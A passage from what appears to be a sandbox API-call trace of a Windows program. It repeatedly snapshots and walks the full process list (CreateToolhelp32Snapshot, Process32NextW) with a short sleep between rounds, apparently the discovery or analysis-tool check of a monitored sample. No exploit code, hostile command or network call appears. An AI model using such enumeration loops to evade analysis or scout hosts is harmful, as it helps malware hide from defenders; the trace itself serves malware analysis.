pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0145.684] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x58c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x358, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1 [0145.685] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x598, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x330, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0145.687] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1e, th32ParentProcessID=0x584, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0145.688] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x61c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, 
szExeFile="svchost.exe")) returned 1 [0145.689] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x50c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x1d8, pcPriClassBase=6, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0145.691] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x6c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="fired-isolation-deny.exe")) returned 1 [0145.692] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x144, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="penguin weight doctrine.exe")) returned 1 [0145.694] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x49c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="requires bowling ireland.exe")) returned 1 [0145.695] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="xplivecam.exe")) returned 1 [0145.697] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x180, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="kissingaerospace.exe")) returned 1 [0145.698] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x230, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, 
th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="slopefirewall.exe")) returned 1 [0145.700] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x118, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="motors.exe")) returned 1 [0145.701] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x480, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="ins.exe")) returned 1 [0145.703] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x504, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="marble.exe")) returned 1 [0145.704] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="enlargement_zen_vb.exe")) returned 1 [0145.705] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x79c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="manuals_z.exe")) returned 1 [0145.707] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x810, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="infant coins forced.exe")) returned 1 [0145.708] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x820, th32DefaultHeapID=0x0, th32ModuleID=0x0, 
cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="attend.exe")) returned 1 [0145.709] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x830, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="concerned.exe")) returned 1 [0145.711] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x840, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="sandwichtelevisions.exe")) returned 1 [0145.712] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x850, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="pickup.exe")) returned 1 [0145.713] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x860, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="athletics-americans.exe")) returned 1 [0145.715] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x870, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="proudlydocumented.exe")) returned 1 [0145.716] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x880, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="ajbehaviord.exe")) returned 1 [0145.717] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x940, 
th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1 [0145.719] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x960, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0145.720] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xaec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0xacc, pcPriClassBase=8, dwFlags=0x0, szExeFile="XEY8d7zI.exe")) returned 1 [0145.721] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xc14, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xba4, pcPriClassBase=8, dwFlags=0x0, szExeFile="LSfkRHur.exe")) returned 1 [0145.722] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xc40, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xc0c, pcPriClassBase=8, dwFlags=0x0, szExeFile="Sypykbck.exe")) returned 1 [0145.724] CloseHandle (hObject=0xbc) returned 1 [0145.724] Sleep (dwMilliseconds=0x12c) [0146.220] CreateToolhelp32Snapshot (dwFlags=0xf, th32ProcessID=0x0) returned 0xc4 [0146.226] Process32FirstW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0146.227] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x50, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, 
szExeFile="System")) returned 1 [0146.228] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0146.229] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x148, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0146.230] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x178, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0146.231] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x184, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0146.231] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0146.232] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x178, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0146.233] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x178, pcPriClassBase=9, dwFlags=0x0, 
szExeFile="lsass.exe")) returned 1 [0146.234] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x178, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1 [0146.235] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x254, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0146.236] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x294, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0146.236] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x15, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0146.237] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x330, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0146.238] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x358, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x25, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0146.239] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x39c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x2c4, pcPriClassBase=8, dwFlags=0x0, 
szExeFile="audiodg.exe")) returned 1 [0146.240] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0146.240] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x43c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0146.241] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0146.243] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4f8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0146.245] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x540, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0146.246] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x58c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x358, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1 [0146.247] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x598, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x330, pcPriClassBase=8, dwFlags=0x0, 
szExeFile="dwm.exe")) returned 1 [0146.249] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1e, th32ParentProcessID=0x584, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0146.250] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x61c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0146.252] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x50c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x1d8, pcPriClassBase=6, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0146.253] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x6c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="fired-isolation-deny.exe")) returned 1 [0146.255] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x144, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="penguin weight doctrine.exe")) returned 1 [0146.257] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x49c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="requires bowling ireland.exe")) returned 1 [0146.258] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, 
th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="xplivecam.exe")) returned 1 [0146.369] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x180, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="kissingaerospace.exe")) returned 1 [0146.371] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x230, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="slopefirewall.exe")) returned 1 [0146.373] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x118, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="motors.exe")) returned 1 [0146.374] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x480, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="ins.exe")) returned 1 [0146.376] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x504, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="marble.exe")) returned 1 [0146.377] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="enlargement_zen_vb.exe")) returned 1 [0146.379] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x79c, th32DefaultHeapID=0x0, th32ModuleID=0x0, 
cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="manuals_z.exe")) returned 1 [0146.380] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x810, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="infant coins forced.exe")) returned 1 [0146.382] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x820, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="attend.exe")) returned 1 [0146.384] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x830, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="concerned.exe")) returned 1 [0146.385] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x840, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="sandwichtelevisions.exe")) returned 1 [0146.387] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x850, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="pickup.exe")) returned 1 [0146.388] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x860, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="athletics-americans.exe")) returned 1 [0146.390] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x870, 
th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="proudlydocumented.exe")) returned 1 [0146.391] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x880, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="ajbehaviord.exe")) returned 1 [0146.393] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x940, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1 [0146.394] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x960, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0146.395] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xaec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0xacc, pcPriClassBase=8, dwFlags=0x0, szExeFile="XEY8d7zI.exe")) returned 1 [0146.397] CloseHandle (hObject=0xc4) returned 1 [0146.397] CreateToolhelp32Snapshot (dwFlags=0xf, th32ProcessID=0x0) returned 0xbc [0146.404] Process32FirstW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0146.405] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x50, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 
